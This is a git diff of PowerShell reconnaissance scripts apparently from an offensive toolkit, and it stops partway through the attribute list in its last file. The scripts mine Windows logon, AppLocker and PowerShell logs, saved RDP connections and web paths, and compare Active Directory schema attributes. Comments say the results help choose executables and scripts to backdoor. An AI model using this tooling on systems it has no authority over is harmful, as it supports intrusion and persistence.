Find-AppLockerLog $PSLogs = Find-PSScriptsInPSAppLog - $RdpClientData = Find-RDPClientConnections + $RdpClientData = Find-RDPClientConnection if ($ToString) { @@ -88,29 +87,29 @@ Github repo: https://github.com/clymb3r/PowerShell } -function Find-4648Logons +function Find-4648Logon { <# .SYNOPSIS -Retrieve the unique 4648 logon events. This will often find cases where a user is using remote desktop to connect to another computer. It will give the +Retrieve the unique 4648 logon events. This will often find cases where a user is using remote desktop to connect to another computer. It will give the the account that RDP was launched with and the account name of the account being used to connect to the remote computer. This is useful for identifying normal authenticaiton patterns. Other actions that will trigger this include any runas action. -Function: Find-4648Logons -Author: Joe Bialek, Twitter: @JosephBialek -Required Dependencies: None -Optional Dependencies: None +Function: Find-4648Logon +Author: Joe Bialek, Twitter: @JosephBialek +Required Dependencies: None +Optional Dependencies: None .DESCRIPTION -Retrieve the unique 4648 logon events. This will often find cases where a user is using remote desktop to connect to another computer. It will give the +Retrieve the unique 4648 logon events. This will often find cases where a user is using remote desktop to connect to another computer. It will give the the account that RDP was launched with and the account name of the account being used to connect to the remote computer. This is useful for identifying normal authenticaiton patterns. Other actions that will trigger this include any runas action. .EXAMPLE -Find-4648Logons +Find-4648Logon Gets the unique 4648 logon events. .NOTES @@ -120,11 +119,12 @@ Gets the unique 4648 logon events. Blog: http://clymb3r.wordpress.com/ Github repo: https://github.com/clymb3r/PowerShell #> + Param( $SecurityLog ) - $ExplicitLogons = $SecurityLog | Where {$_.InstanceID -eq 4648} + $ExplicitLogons = $SecurityLog | Where-Object {$_.InstanceID -eq 4648} $ReturnInfo = @{} foreach ($ExplicitLogon in $ExplicitLogons) @@ -216,7 +216,7 @@ Github repo: https://github.com/clymb3r/PowerShell return $ReturnInfo } -function Find-4624Logons +function Find-4624Logon { <# .SYNOPSIS @@ -224,10 +224,10 @@ function Find-4624Logons Find all unique 4624 Logon events to the server. This will tell you who is logging in and how. You can use this to figure out what accounts do network logons in to the server, what accounts RDP in, what accounts log in locally, etc... -Function: Find-4624Logons -Author: Joe Bialek, Twitter: @JosephBialek -Required Dependencies: None -Optional Dependencies: None +Function: Find-4624Logon +Author: Joe Bialek, Twitter: @JosephBialek +Required Dependencies: None +Optional Dependencies: None .DESCRIPTION @@ -236,7 +236,7 @@ network logons in to the server, what accounts RDP in, what accounts log in loca .EXAMPLE -Find-4624Logons +Find-4624Logon Find unique 4624 logon events. .NOTES @@ -250,7 +250,7 @@ Github repo: https://github.com/clymb3r/PowerShell $SecurityLog ) - $Logons = $SecurityLog | Where {$_.InstanceID -eq 4624} + $Logons = $SecurityLog | Where-Object {$_.InstanceID -eq 4624} $ReturnInfo = @{} foreach ($Logon in $Logons) @@ -362,17 +362,17 @@ Github repo: https://github.com/clymb3r/PowerShell } -function Find-AppLockerLogs +function Find-AppLockerLog { <# .SYNOPSIS Look through the AppLocker logs to find processes that get run on the server. You can then backdoor these exe's (or figure out what they normally run). -Function: Find-AppLockerLogs -Author: Joe Bialek, Twitter: @JosephBialek -Required Dependencies: None -Optional Dependencies: None +Function: Find-AppLockerLog +Author: Joe Bialek, Twitter: @JosephBialek +Required Dependencies: None +Optional Dependencies: None .DESCRIPTION @@ -380,7 +380,7 @@ Look through the AppLocker logs to find processes that get run on the server. Yo .EXAMPLE -Find-AppLockerLogs +Find-AppLockerLog Find process creations from AppLocker logs. .NOTES @@ -390,9 +390,10 @@ Find process creations from AppLocker logs. Blog: http://clymb3r.wordpress.com/ Github repo: https://github.com/clymb3r/PowerShell #> + $ReturnInfo = @{} - $AppLockerLogs = Get-WinEvent -LogName "Microsoft-Windows-AppLocker/EXE and DLL" -ErrorAction SilentlyContinue | Where {$_.Id -eq 8002} + $AppLockerLogs = Get-WinEvent -LogName "Microsoft-Windows-AppLocker/EXE and DLL" -ErrorAction SilentlyContinue | Where-Object {$_.Id -eq 8002} foreach ($Log in $AppLockerLogs) { @@ -434,10 +435,10 @@ Function Find-PSScriptsInPSAppLog Go through the PowerShell operational log to find scripts that run (by looking for ExecutionPipeline logs eventID 4100 in PowerShell app log). You can then backdoor these scripts or do other malicious things. -Function: Find-AppLockerLogs -Author: Joe Bialek, Twitter: @JosephBialek -Required Dependencies: None -Optional Dependencies: None +Function: Find-AppLockerLog +Author: Joe Bialek, Twitter: @JosephBialek +Required Dependencies: None +Optional Dependencies: None .DESCRIPTION @@ -456,12 +457,12 @@ Find unique PowerShell scripts being executed from the PowerShell operational lo Blog: http://clymb3r.wordpress.com/ Github repo: https://github.com/clymb3r/PowerShell #> + $ReturnInfo = @{} - $Logs = Get-WinEvent -LogName "Microsoft-Windows-PowerShell/Operational" -ErrorAction SilentlyContinue | Where {$_.Id -eq 4100} + $Logs = Get-WinEvent -LogName "Microsoft-Windows-PowerShell/Operational" -ErrorAction SilentlyContinue | Where-Object {$_.Id -eq 4100} foreach ($Log in $Logs) { - $ContainsScriptName = $false $LogDetails = $Log.Message -split "`r`n" $FoundScriptName = $false @@ -506,27 +507,26 @@ Github repo: https://github.com/clymb3r/PowerShell } -Function Find-RDPClientConnections +Function Find-RDPClientConnection { <# .SYNOPSIS -Search the registry to find saved RDP client connections. This shows you what connections an RDP client has remembered, indicating what servers the user +Search the registry to find saved RDP client connections. This shows you what connections an RDP client has remembered, indicating what servers the user usually RDP's to. -Function: Find-RDPClientConnections -Author: Joe Bialek, Twitter: @JosephBialek -Required Dependencies: None -Optional Dependencies: None +Function: Find-RDPClientConnection +Author: Joe Bialek, Twitter: @JosephBialek +Required Dependencies: None +Optional Dependencies: None .DESCRIPTION -Search the registry to find saved RDP client connections. This shows you what connections an RDP client has remembered, indicating what servers the user -usually RDP's to. +Search the registry to find saved RDP client connections. This shows you what connections an RDP client has remembered, indicating what servers the user usually RDP's to. .EXAMPLE -Find-RDPClientConnections +Find-RDPClientConnection Find unique saved RDP client connections. .NOTES @@ -550,7 +550,7 @@ Github repo: https://github.com/clymb3r/PowerShell { $Server = $Server.PSChildName $UsernameHint = (Get-ItemProperty -Path "HKU:\$($UserSid)\Software\Microsoft\Terminal Server Client\Servers\$($Server)").UsernameHint - + $Key = $UserSid + "::::" + $Server + "::::" + $UsernameHint if (!$ReturnInfo.ContainsKey($Key)) diff --git a/Recon/Get-HttpStatus.ps1 b/Recon/Get-HttpStatus.ps1 index 8b60306d..b271efde 100644 --- a/Recon/Get-HttpStatus.ps1 +++ b/Recon/Get-HttpStatus.ps1 @@ -5,11 +5,11 @@ function Get-HttpStatus Returns the HTTP Status Codes and full URL for specified paths. -PowerSploit Function: Get-HttpStatus -Author: Chris Campbell (@obscuresec) -License: BSD 3-Clause -Required Dependencies: None -Optional Dependencies: None +PowerSploit Function: Get-HttpStatus +Author: Chris Campbell (@obscuresec) +License: BSD 3-Clause +Required Dependencies: None +Optional Dependencies: None .DESCRIPTION @@ -42,7 +42,7 @@ C:\PS> Get-HttpStatus -Target www.example.com -Path c:\dictionary.txt -UseSSL .NOTES HTTP Status Codes: 100 - Informational * 200 - Success * 300 - Redirection * 400 - Client Error * 500 - Server Error - + .LINK http://obscuresecurity.blogspot.com @@ -64,49 +64,54 @@ http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html [Switch] $UseSSL ) - + if (Test-Path $Path) { - + if ($UseSSL -and $Port -eq 0) { # Default to 443 if SSL is specified but no port is specified $Port = 443 - } elseif ($Port -eq 0) { + } + elseif ($Port -eq 0) { # Default to port 80 if no port is specified $Port = 80 } - + $TcpConnection = New-Object System.Net.Sockets.TcpClient Write-Verbose "Path Test Succeeded - Testing Connectivity" - + try { # Validate that the host is listening before scanning $TcpConnection.Connect($Target, $Port) - } catch { + } + catch { Write-Error "Connection Test Failed - Check Target" $Tcpconnection.Close() - Return + Return } - + $Tcpconnection.Close() - } else { + } + else { Write-Error "Path Test Failed - Check Dictionary Path" Return } - + if ($UseSSL) { $SSL = 's' # Ignore invalid SSL certificates [System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $True } - } else { + } + else { $SSL = '' } - + if (($Port -eq 80) -or ($Port -eq 443)) { $PortNum = '' - } else { + } + else { $PortNum = ":$Port" } - + # Check Http status for each entry in the doctionary file foreach ($Item in Get-Content $Path) { @@ -117,24 +122,23 @@ http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html $WebRequest = [System.Net.WebRequest]::Create($URI) $WebResponse = $WebRequest.GetResponse() $WebStatus = $WebResponse.StatusCode - $ResultObject += $ScanObject $WebResponse.Close() - } catch { + } + catch { $WebStatus = $Error[0].Exception.InnerException.Response.StatusCode - - if ($WebStatus -eq $null) { + + if (-not $WebStatus) { # Not every exception returns a StatusCode. # If that is the case, return the Status. $WebStatus = $Error[0].Exception.InnerException.Status } - } - + } + $Result = @{ Status = $WebStatus; URL = $WebTarget} - + $ScanObject = New-Object -TypeName PSObject -Property $Result - + Write-Output $ScanObject - } } diff --git a/Recon/Invoke-CompareAttributesForClass.ps1 b/Recon/Invoke-CompareAttributesForClass.ps1 new file mode 100644 index 00000000..b2d11c69 --- /dev/null +++ b/Recon/Invoke-CompareAttributesForClass.ps1 @@ -0,0 +1,1044 @@ +function Get-AllAttributesForClass +{<# +.Synopsis + Gets all AD Schema attributes for class +.DESCRIPTION + This function will get all attributes for a class from AD. +.EXAMPLE + PS C:\> Get-AllAttributesForAClass -class user +.EXAMPLE + PS C:\> Get-AllAttributesForAClass -class computer +#> + [CmdletBinding()] + Param( + [Parameter(Mandatory=$true)] + [String] + $Class + ) + + Process { + #Custom object + $ListOfAttributesFromAD = @() + + #lets get all classes and store in a variable. + $NextClass = $Class + $AllClasses = Do + { + $CurrentClass = $NextClass + $NextClass = Get-ADObject -SearchBase "$((Get-ADRootDSE).SchemaNamingContext)" -Filter {lDAPDisplayName -eq $NextClass} -properties subClassOf |Select-Object -ExpandProperty subClassOf + $CurrentClass + } + While($CurrentClass -ne $NextClass) + #Now that we have our classes in $allClasses lets turn to the attributes + $attributAttributes = 'MayContain','MustContain','systemMayContain','systemMustContain' + Write-verbose "Attempting to find all attributes for the AD Object: $($ADObj.Name)" + $AllAttributes = ForEach ($Class in $AllClasses) + { + $ClassInfo = Get-ADObject -SearchBase "$((Get-ADRootDSE).SchemaNamingContext)" -Filter {lDAPDisplayName -eq $Class} -properties $attributAttributes + ForEach ($attribute in $attributAttributes) + { + $ListOfAttributesFromAD += $ClassInfo.$attribute + $ClassInfo.$attribute + } + } + $ListOfAttributesAD = $ListOfAttributesFromAD | Sort-Object -Unique + write-output $ListOfAttributesAD + } + End + { + } +} + + +function Invoke-CompareAttributesForClass +{ +<# +.Synopsis + Author: @oddvarmoe + Required Dependencies: Search-ADAccounts, Set-ADComputer, Get-ADForest, Get-ADDomain, + Optional Dependencies: None + Compares list of attributes with active attributes in Active Directory. Currently only works with user and computer class. + +.DESCRIPTION + Compares list of attributes with active attributes in Active Directory. + This function is used to spot unusal attributes. + + Example where an attribute is found in AD and not in compare list: + InputObject SideIndicator + ----------- ------------- + TopSecretAttribute => + + +.EXAMPLE + PS C:\> Invoke-CompareAttributesForClass -Class user + +.EXAMPLE + PS C:\> Invoke-CompareAttributesForClass -Class computer +#> + [CmdletBinding()] + Param( + [Parameter(Mandatory=$true)] + [ValidateSet("User","Computer")] + [String] + $Class + ) + + Process { + #https://msdn.microsoft.com/en-us/library/ms683980(v=vs.85).aspx + #List of attributes generated from demo AD with Exchange schema changes on Server 2016 DC + #TODO: Attributes based on AD Domain level or Schema version. + if($Class -eq "user"){ + $UserAttributeListFromAD = Get-AllAttributesForClass -Class user + + $UserAttributelist = @( + "accountExpires", + "aCSPolicyName", + "adminCount", + "adminDescription", + "adminDisplayName", + "allowedAttributes", + "allowedAttributesEffective", + "allowedChildClasses", + "allowedChildClassesEffective", + "assistant", + "attributeCertificateAttribute", + "audio", + "badPasswordTime", + "badPwdCount", + "bridgeheadServerListBL", + "businessCategory", + "businessRoles", + "c", + "canonicalName", + "carLicense", + "cn", + "co", + "codePage", + "comment", + "company", + "controlAccessRights", + "countryCode", + "createTimeStamp", + "dBCSPwd", + "defaultClassStore", + "department", + "departmentNumber", + "description", + "desktopProfile", + "destinationIndicator", + "directReports", + "displayName", + "displayNamePrintable", + "distinguishedName", + "division", + "dSASignature", + "dSCorePropagationData", + "dynamicLDAPServer", + "employeeID", + "employeeNumber", + "employeeType", + "extensionName", + "facsimileTelephoneNumber", + "flags", + "fromEntry", + "frsComputerReferenceBL", + "fRSMemberReferenceBL", + "fSMORoleOwner", + "generationQualifier", + "givenName", + "groupMembershipSAM", + "groupPriority", + "groupsToIgnore", + "homeDirectory", + "homeDrive", + "homePhone", + "homePostalAddress", + "houseIdentifier", + "initials", + "instanceType", + "internationalISDNNumber", + "ipPhone", + "isCriticalSystemObject", + "isDeleted", + "isPrivilegeHolder", + "isRecycled", + "jpegPhoto", + "kMServer", + "l", + "labeledURI", + "lastKnownParent", + "lastLogoff", + "lastLogon", + "lastLogonTimestamp", + "lmPwdHistory", + "localeID", + "lockoutTime", + "logonCount", + "logonHours", + "logonWorkstation", + "mail", + "managedObjects", + "manager", + "masteredBy", + "maxStorage", + "memberOf", + "mhsORAddress", + "middleName", + "mobile", + "modifyTimeStamp", + "msCOM-PartitionSetLink", + "msCOM-UserLink", + "msCOM-UserPartitionSetLink", + "msDFSR-ComputerReferenceBL", + "msDFSR-MemberReferenceBL", + "msDRM-IdentityCertificate", + "msDS-AllowedToActOnBehalfOfOtherIdentity", + "msDS-AllowedToDelegateTo", + "msDS-Approx-Immed-Subordinates", + "msDS-AssignedAuthNPolicy", + "msDS-AssignedAuthNPolicySilo", + "msDS-AuthenticatedAtDC", + "msDS-AuthenticatedToAccountlist", + "msDS-AuthNPolicySiloMembersBL", + "msDS-Cached-Membership", + "msDS-Cached-Membership-Time-Stamp", + "msDS-ClaimSharesPossibleValuesWithBL", + "msDS-CloudAnchor", + "mS-DS-ConsistencyChildCount", + "mS-DS-ConsistencyGuid", + "mS-DS-CreatorSID", + "msDS-EnabledFeatureBL", + "msDS-FailedInteractiveLogonCount", + "msDS-FailedInteractiveLogonCountAtLastSuccessfulLogon", + "msDS-HABSeniorityIndex", + "msDS-HostServiceAccountBL", + "msDS-IsDomainFor", + "msDS-IsFullReplicaFor", + "msDS-IsPartialReplicaFor", + "msDS-IsPrimaryComputerFor", + "msDS-KeyCredentialLink", + "msDS-KeyPrincipalBL", + "msDS-KrbTgtLinkBl", + "msDS-LastFailedInteractiveLogonTime", + "msDS-LastKnownRDN", + "msDS-LastSuccessfulInteractiveLogonTime", + "msDS-LocalEffectiveDeletionTime", + "msDS-LocalEffectiveRecycleTime", + "msDs-masteredBy", + "msds-memberOfTransitive", + "msDS-MembersForAzRoleBL", + "msDS-MembersOfResourcePropertyListBL", + "msds-memberTransitive", + "msDS-NCReplCursors", + "msDS-NCReplInboundNeighbors", + "msDS-NCReplOutboundNeighbors", + "msDS-NC-RO-Replica-Locations-BL", + "msDS-NcType", + "msDS-NonMembersBL", + "msDS-ObjectReferenceBL", + "msDS-ObjectSoa", + "msDS-OIDToGroupLinkBl", + "msDS-OperationsForAzRoleBL", + "msDS-OperationsForAzTaskBL", + "msDS-parentdistname", + "msDS-PhoneticCompanyName", + "msDS-PhoneticDepartment", + "msDS-PhoneticDisplayName", + "msDS-PhoneticFirstName", + "msDS-PhoneticLastName", + "msDS-PrimaryComputer", + "msDS-PrincipalName", + "msDS-PSOApplied", + "msDS-ReplAttributeMetaData", + "msDS-ReplValueMetaData", + "msDS-ReplValueMetaDataExt", + "msDS-ResultantPSO", + "msDS-RevealedDSAs", + "msDS-RevealedListBL", + "msDS-SecondaryKrbTgtNumber", + "msDS-Site-Affinity", + "msDS-SourceAnchor", + "msDS-SourceObjectDN", + "msDS-SupportedEncryptionTypes", + "msDS-SyncServerUrl", + "msDS-TasksForAzRoleBL", + "msDS-TasksForAzTaskBL", + "msDS-TDOEgressBL", + "msDS-TDOIngressBL", + "msDS-User-Account-Control-Computed", + "msDS-UserPasswordExpiryTimeComputed", + "msDS-ValueTypeReferenceBL", + "msExchAcceptedDomainBL", + "msExchAccountForestBL", + "msExchArchiveDatabaseBL", + "msExchAssociatedAcceptedDomainBL", + "msExchAuthPolicyBL", + "msExchAuxMailboxParentObjectIdBL", + "msExchAvailabilityOrgWideAccountBL", + "msExchAvailabilityPerUserAccountBL", + "msExchCatchAllRecipientBL", + "msExchConferenceMailboxBL", + "msExchControllingZone", + "msExchDataEncryptionPolicyBL", + "msExchDelegateListBL", + "msExchDeviceAccessControlRuleBL", + "msExchEvictedMemebersBL", + "msExchHABRootDepartmentBL", + "msExchHouseIdentifier", + "msExchHygieneConfigurationMalwareBL", + "msExchHygieneConfigurationSpamBL", + "msExchIMAPOWAURLPrefixOverride", + "msExchIntendedMailboxPlanBL", + "msExchMailboxMoveSourceArchiveMDBBL", + "msExchMailboxMoveSourceMDBBL", + "msExchMailboxMoveSourceUserBL", + "msExchMailboxMoveStorageMDBBL", + "msExchMailboxMoveTargetArchiveMDBBL", + "msExchMailboxMoveTargetMDBBL", + "msExchMailboxMoveTargetUserBL", + "msExchMDBAvailabilityGroupConfigurationBL", + "msExchMobileRemoteDocumentsAllowedServersBL", + "msExchMobileRemoteDocumentsBlockedServersBL", + "msExchMobileRemoteDocumentsInternalDomainSuffixListBL", + "msExchMultiMailboxDatabasesBL", + "msExchMultiMailboxLocationsBL", + "msExchOABGeneratingMailboxBL", + "msExchOrganizationsAddressBookRootsBL", + "msExchOrganizationsGlobalAddressListsBL", + "msExchOrganizationsTemplateRootsBL", + "msExchOriginatingForest", + "msExchOWAAllowedFileTypesBL", + "msExchOWAAllowedMimeTypesBL", + "msExchOWABlockedFileTypesBL", + "msExchOWABlockedMIMETypesBL", + "msExchOWAForceSaveFileTypesBL", + "msExchOWAForceSaveMIMETypesBL", + "msExchOWARemoteDocumentsAllowedServersBL", + "msExchOWARemoteDocumentsBlockedServersBL", + "msExchOWARemoteDocumentsInternalDomainSuffixListBL", + "msExchOWATranscodingFileTypesBL", + "msExchOWATranscodingMimeTypesBL", + "msExchParentPlanBL", + "msExchQueryBaseDN", + "msExchRBACPolicyBL", + "msExchResourceGUID", + "msExchResourceProperties", + "msExchRMSComputerAccountsBL", + "msExchServerAssociationBL", + "msExchServerSiteBL", + "msExchSMTPReceiveDefaultAcceptedDomainBL", + "msExchSupervisionDLBL", + "msExchSupervisionOneOffBL", + "msExchSupervisionUserBL", + "msExchTransportRuleTargetBL", + "msExchTrustedDomainBL", + "msExchUGMemberBL", + "msExchUserBL", + "msExchUserCulture", + "msIIS-FTPDir", + "msIIS-FTPRoot", + "mSMQDigests", + "mSMQDigestsMig", + "mSMQSignCertificates", + "mSMQSignCertificatesMig", + "msNPAllowDialin", + "msNPCallingStationID", + "msNPSavedCallingStationID", + "msOrg-LeadersBL", + "msPKIAccountCredentials", + "msPKI-CredentialRoamingTokens", + "msPKIDPAPIMasterKeys", + "msPKIRoamingTimeStamp", + "msRADIUSCallbackNumber", + "msRADIUS-FramedInterfaceId", + "msRADIUSFramedIPAddress", + "msRADIUS-FramedIpv6Prefix", + "msRADIUS-FramedIpv6Route", + "msRADIUSFramedRoute", + "msRADIUS-SavedFramedInterfaceId", + "msRADIUS-SavedFramedIpv6Prefix", + "msRADIUS-SavedFramedIpv6Route", + "msRADIUSServiceType", + "msRASSavedCallbackNumber", + "msRASSavedFramedIPAddress", + "msRASSavedFramedRoute", + "msRTCSIP-AcpInfo", + "msRTCSIP-ApplicationOptions", + "msRTCSIP-ArchivingEnabled", + "msRTCSIP-DeploymentLocator", + "msRTCSIP-FederationEnabled", + "msRTCSIP-GroupingID", + "msRTCSIP-InternetAccessEnabled", + "msRTCSIP-Line", + "msRTCSIP-LineServer", + "msRTCSIP-OptionFlags", + "msRTCSIP-OriginatorSid", + "msRTCSIP-OwnerUrn", + "msRTCSIP-PrimaryHomeServer", + "msRTCSIP-PrimaryUserAddress", + "msRTCSIP-PrivateLine", + "msRTCSIP-TargetHomeServer", + "msRTCSIP-TargetUserPolicies", + "msRTCSIP-TenantId", + "msRTCSIP-UserEnabled", + "msRTCSIP-UserExtension", + "msRTCSIP-UserLocationProfile", + "msRTCSIP-UserPolicies", + "msRTCSIP-UserPolicy", + "msRTCSIP-UserRoutingGroupId", + "msSFU30Name", + "msSFU30NisDomain", + "msSFU30PosixMemberOf", + "msTSAllowLogon", + "msTSBrokenConnectionAction", + "msTSConnectClientDrives", + "msTSConnectPrinterDrives", + "msTSDefaultToMainPrinter", + "msTSExpireDate", + "msTSExpireDate2", + "msTSExpireDate3", + "msTSExpireDate4", + "msTSHomeDirectory", + "msTSHomeDrive", + "msTSInitialProgram", + "msTSLicenseVersion", + "msTSLicenseVersion2", + "msTSLicenseVersion3", + "msTSLicenseVersion4", + "msTSLSProperty01", + "msTSLSProperty02", + "msTSManagingLS", + "msTSManagingLS2", + "msTSManagingLS3", + "msTSManagingLS4", + "msTSMaxConnectionTime", + "msTSMaxDisconnectionTime", + "msTSMaxIdleTime", + "msTSPrimaryDesktop", + "msTSProfilePath", + "msTSProperty01", + "msTSProperty02", + "msTSReconnectionAction", + "msTSRemoteControl", + "msTSSecondaryDesktops", + "msTSWorkDirectory", + "name", + "netbootSCPBL", + "networkAddress", + "nonSecurityMemberBL", + "ntPwdHistory", + "nTSecurityDescriptor", + "o", + "objectCategory", + "objectClass", + "objectGUID", + "objectVersion", + "operatorCount", + "otherFacsimileTelephoneNumber", + "otherHomePhone", + "otherIpPhone", + "otherLoginWorkstations", + "otherMailbox", + "otherMobile", + "otherPager", + "otherTelephone", + "otherWellKnownObjects", + "ou", + "ownerBL", + "pager", + "partialAttributeDeletionList", + "partialAttributeSet", + "personalPager", + "personalTitle", + "photo", + "physicalDeliveryOfficeName", + "possibleInferiors", + "postalAddress", + "postalCode", + "postOfficeBox", + "preferredDeliveryMethod", + "preferredLanguage", + "preferredOU", + "primaryGroupID", + "primaryInternationalISDNNumber", + "primaryTelexNumber", + "profilePath", + "proxiedObjectName", + "proxyAddresses", + "pwdLastSet", + "queryPolicyBL", + "registeredAddress", + "replPropertyMetaData", + "replUpToDateVector", + "repsFrom", + "repsTo", + "revision", + "roomNumber", + "scriptPath", + "sDRightsEffective", + "secretary", + "seeAlso", + "serialNumber", + "serverReferenceBL", + "servicePrincipalName", + "showInAdvancedViewOnly", + "siteObjectBL", + "sn", + "st", + "street", + "streetAddress", + "structuralObjectClass", + "subRefs", + "subSchemaSubEntry", + "systemFlags", + "telephoneAssistant", + "telephoneNumber", + "teletexTerminalIdentifier", + "telexNumber", + "terminalServer", + "thumbnailLogo", + "thumbnailPhoto", + "title", + "uid", + "unicodePwd", + "url", + "userAccountControl", + "userCertificate", + "userParameters", + "userPassword", + "userPKCS12", + "userPrincipalName", + "userSharedFolder", + "userSharedFolderOther", + "userSMIMECertificate", + "userWorkstations", + "uSNChanged", + "uSNCreated", + "uSNDSALastObjRemoved", + "USNIntersite", + "uSNLastObjRem", + "uSNSource", + "wbemPath", + "wellKnownObjects", + "whenChanged", + "whenCreated", + "wWWHomePage", + "x121Address", + "x500uniqueIdentifier" + ) + $Compare = Compare-Object -ReferenceObject $UserAttributelist -DifferenceObject $UserAttributeListFromAD + Write-Output $Compare + } + + if($Class -eq "computer"){ + $ComputerAttributeListFromAD = Get-AllAttributesForClass -Class computer + + $ComputerAttributeList = @( + "accountExpires", + "aCSPolicyName", + "adminCount", + "adminDescription", + "adminDisplayName", + "allowedAttributes", + "allowedAttributesEffective", + "allowedChildClasses", + "allowedChildClassesEffective", + "assistant", + "attributeCertificateAttribute", + "audio", + "badPasswordTime", + "badPwdCount", + "bridgeheadServerListBL", + "businessCategory", + "businessRoles", + "c", + "canonicalName", + "carLicense", + "catalogs", + "cn", + "co", + "codePage", + "comment", + "company", + "controlAccessRights", + "countryCode", + "createTimeStamp", + "dBCSPwd", + "defaultClassStore", + "defaultLocalPolicyObject", + "department", + "departmentNumber", + "description", + "desktopProfile", + "destinationIndicator", + "directReports", + "displayName", + "displayNamePrintable", + "distinguishedName", + "division", + "dNSHostName", + "dSASignature", + "dSCorePropagationData", + "dynamicLDAPServer", + "employeeID", + "employeeNumber", + "employeeType", + "extensionName", + "facsimileTelephoneNumber", + "flags", + "fromEntry", + "frsComputerReferenceBL", + "fRSMemberReferenceBL", + "fSMORoleOwner", + "generationQualifier", + "givenName", + "groupMembershipSAM", + "groupPriority", + "groupsToIgnore", + "homeDirectory", + "homeDrive", + "homePhone", + "homePostalAddress", + "houseIdentifier", + "initials", + "instanceType", + "internationalISDNNumber", + "ipPhone", + "isCriticalSystemObject", + "isDeleted", + "isPrivilegeHolder", + "isRecycled", + "jpegPhoto", + "kMServer", + "l", + "labeledURI", + "lastKnownParent", + "lastLogoff", + "lastLogon", + "lastLogonTimestamp", + "lmPwdHistory", + "localeID", + "localPolicyFlags", + "location", + "lockoutTime", + "logonCount", + "logonHours", + "logonWorkstation", + "logRolloverInterval", + "machineRole", + "mail", + "managedBy", + "managedObjects", + "manager", + "masteredBy", + "maxStorage", + "memberOf", + "mhsORAddress", + "middleName", + "mobile", + "modifyTimeStamp", + "monitoredConfigurations", + "monitoredServices", + "monitoringAvailabilityStyle", + "monitoringAvailabilityWindow", + "monitoringCachedViaMail", + "monitoringCachedViaRPC", + "monitoringMailUpdateInterval", + "monitoringMailUpdateUnits", + "monitoringRPCUpdateInterval", + "monitoringRPCUpdateUnits", + "msCOM-PartitionSetLink", + "msCOM-UserLink", + "msCOM-UserPartitionSetLink", + "msDFSR-ComputerReferenceBL", + "msDFSR-MemberReferenceBL", + "msDRM-IdentityCertificate", + "msDS-AdditionalDnsHostName", + "msDS-AdditionalSamAccountName", + "msDS-AllowedToActOnBehalfOfOtherIdentity", + "msDS-AllowedToDelegateTo", + "msDS-Approx-Immed-Subordinates", + "msDS-AssignedAuthNPolicy", + "msDS-AssignedAuthNPolicySilo", + "msDS-AuthenticatedAtDC", + "msDS-AuthenticatedToAccountlist", + "msDS-AuthNPolicySiloMembersBL", + "msDS-Cached-Membership", + "msDS-Cached-Membership-Time-Stamp", + "msDS-ClaimSharesPossibleValuesWithBL", + "msDS-CloudAnchor", + "mS-DS-ConsistencyChildCount", + "mS-DS-ConsistencyGuid", + "mS-DS-CreatorSID", + "msDS-EnabledFeatureBL", + "msDS-ExecuteScriptPassword", + "msDS-FailedInteractiveLogonCount", + "msDS-FailedInteractiveLogonCountAtLastSuccessfulLogon", + "msDS-GenerationId", + "msDS-HABSeniorityIndex", + "msDS-HostServiceAccount", + "msDS-HostServiceAccountBL", + "msDS-IsDomainFor", + "msDS-IsFullReplicaFor", + "msDS-isGC", + "msDS-IsPartialReplicaFor", + "msDS-IsPrimaryComputerFor", + "msDS-isRODC", + "msDS-IsUserCachableAtRodc", + "msDS-KeyCredentialLink", + "msDS-KeyPrincipalBL", + "msDS-KrbTgtLink", + "msDS-KrbTgtLinkBl", + "msDS-LastFailedInteractiveLogonTime", + "msDS-LastKnownRDN", + "msDS-LastSuccessfulInteractiveLogonTime", + "msDS-LocalEffectiveDeletionTime", + "msDS-LocalEffectiveRecycleTime", + "msDs-masteredBy", + "msds-memberOfTransitive", + "msDS-MembersForAzRoleBL", + "msDS-MembersOfResourcePropertyListBL", + "msds-memberTransitive", + "msDS-NCReplCursors", + "msDS-NCReplInboundNeighbors", + "msDS-NCReplOutboundNeighbors", + "msDS-NC-RO-Replica-Locations-BL", + "msDS-NcType", + "msDS-NeverRevealGroup", + "msDS-NonMembersBL", + "msDS-ObjectReferenceBL", + "msDS-ObjectSoa", + "msDS-OIDToGroupLinkBl", + "msDS-OperationsForAzRoleBL", + "msDS-OperationsForAzTaskBL", + "msDS-parentdistname", + "msDS-PhoneticCompanyName", + "msDS-PhoneticDepartment", + "msDS-PhoneticDisplayName", + "msDS-PhoneticFirstName", + "msDS-PhoneticLastName", + "msDS-PrimaryComputer", + "msDS-PrincipalName", + "msDS-PromotionSettings", + "msDS-PSOApplied", + "msDS-ReplAttributeMetaData", + "msDS-ReplValueMetaData", + "msDS-ReplValueMetaDataExt", + "msDS-ResultantPSO", + "msDS-RevealedDSAs", + "msDS-RevealedList", + "msDS-RevealedListBL", + "msDS-RevealedUsers", + "msDS-RevealOnDemandGroup", + "msDS-SecondaryKrbTgtNumber", + "msDS-Site-Affinity", + "msDS-SiteName", + "msDS-SourceAnchor", + "msDS-SourceObjectDN", + "msDS-SupportedEncryptionTypes", + "msDS-SyncServerUrl", + "msDS-TasksForAzRoleBL", + "msDS-TasksForAzTaskBL", + "msDS-TDOEgressBL", + "msDS-TDOIngressBL", + "msDS-User-Account-Control-Computed", + "msDS-UserPasswordExpiryTimeComputed", + "msDS-ValueTypeReferenceBL", + "msExchAcceptedDomainBL", + "msExchAccountForestBL", + "msExchArchiveDatabaseBL", + "msExchAssociatedAcceptedDomainBL", + "msExchAuthPolicyBL", + "msExchAuxMailboxParentObjectIdBL", + "msExchAvailabilityOrgWideAccountBL", + "msExchAvailabilityPerUserAccountBL", + "msExchCatchAllRecipientBL", + "msExchComponentStates", + "msExchConferenceMailboxBL", + "msExchControllingZone", + "msExchDataEncryptionPolicyBL", + "msExchDelegateListBL", + "msExchDeviceAccessControlRuleBL", + "msExchEvictedMemebersBL", + "msExchExchangeServerLink", + "msExchHABRootDepartmentBL", + "msExchHouseIdentifier", + "msExchHygieneConfigurationMalwareBL", + "msExchHygieneConfigurationSpamBL", + "msExchIMAPOWAURLPrefixOverride", + "msExchIntendedMailboxPlanBL", + "msExchMailboxMoveSourceArchiveMDBBL", + "msExchMailboxMoveSourceMDBBL", + "msExchMailboxMoveSourceUserBL", + "msExchMailboxMoveStorageMDBBL", + "msExchMailboxMoveTargetArchiveMDBBL", + "msExchMailboxMoveTargetMDBBL", + 